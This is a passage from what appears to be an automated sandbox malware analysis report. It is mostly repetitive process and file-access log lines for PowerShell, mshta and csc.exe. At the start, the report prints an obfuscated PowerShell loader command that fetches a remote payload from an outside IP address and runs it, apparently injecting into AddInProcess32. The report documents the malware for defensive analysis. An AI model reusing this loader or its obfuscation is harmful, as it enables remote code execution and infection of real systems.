[dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_079133E2 push 08BA07A2h; retf 3_2_079133E8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_028D6E20 pushfd ; retf 11_2_028D6E21
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_06F801CB push esp; ret 11_2_06F801DD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.dllJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
